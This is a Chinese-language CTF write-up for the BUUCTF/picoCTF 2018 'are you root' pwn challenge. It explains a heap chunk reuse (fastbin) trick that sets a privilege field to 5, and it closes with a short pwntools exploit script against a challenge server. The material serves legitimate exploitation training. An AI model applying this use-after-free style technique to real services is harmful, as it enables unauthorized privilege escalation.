[BUUCTF-pwn]——picoctf_2018_are you root
- 题目地址:点这里
害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数
peak小知识
- strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回.
- strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去.
正文
下面进入正文,首先checksec看下
再去IDA中看下, 好明显的暗示
紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时 *(v6 + 2) == 5
我们可以看到s和v10的距离是6, login加上一个空格的距离也是6
所以, v6就是我们后面输入的字符串以及会申请同样大小的内存空间
我们注意到, *v6会free掉, 如果我们申请的大小为0x10那么放在fastbin里面后,下次我们申请的话,仍然是该空间.
思路
利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 四个字节的每个数据
所以字符只需要是’aaaaaaaa’ + p32(0x5) + ‘aaaa’, 因为p32是4个字节刚好, 当然我们也可以是’aaaaaaaa’ + p64(0x5), 因为是小序端存储, 所以四个字节读取的时候也是5
注意大小应该是0x10, 这样最好,可以百分百申请回来
将其释放掉
重新申请回来这样就不是 * v6指向它了而是v6指向它了
exploit
from pwn import *
#p = process('./PicoCTF_2018_are_you_root')
p = remote('node3.buuoj.cn',27037)
p.sendlineafter('>','login ' + 'a'*0x8 + p32(0x5) + 'aaaa')
p.sendlineafter('>','reset')
p.sendlineafter('>','login aa') #这个aa可以随便输入,只要有并且不溢出就好
p.sendlineafter('>','get-flag')
p.interactive()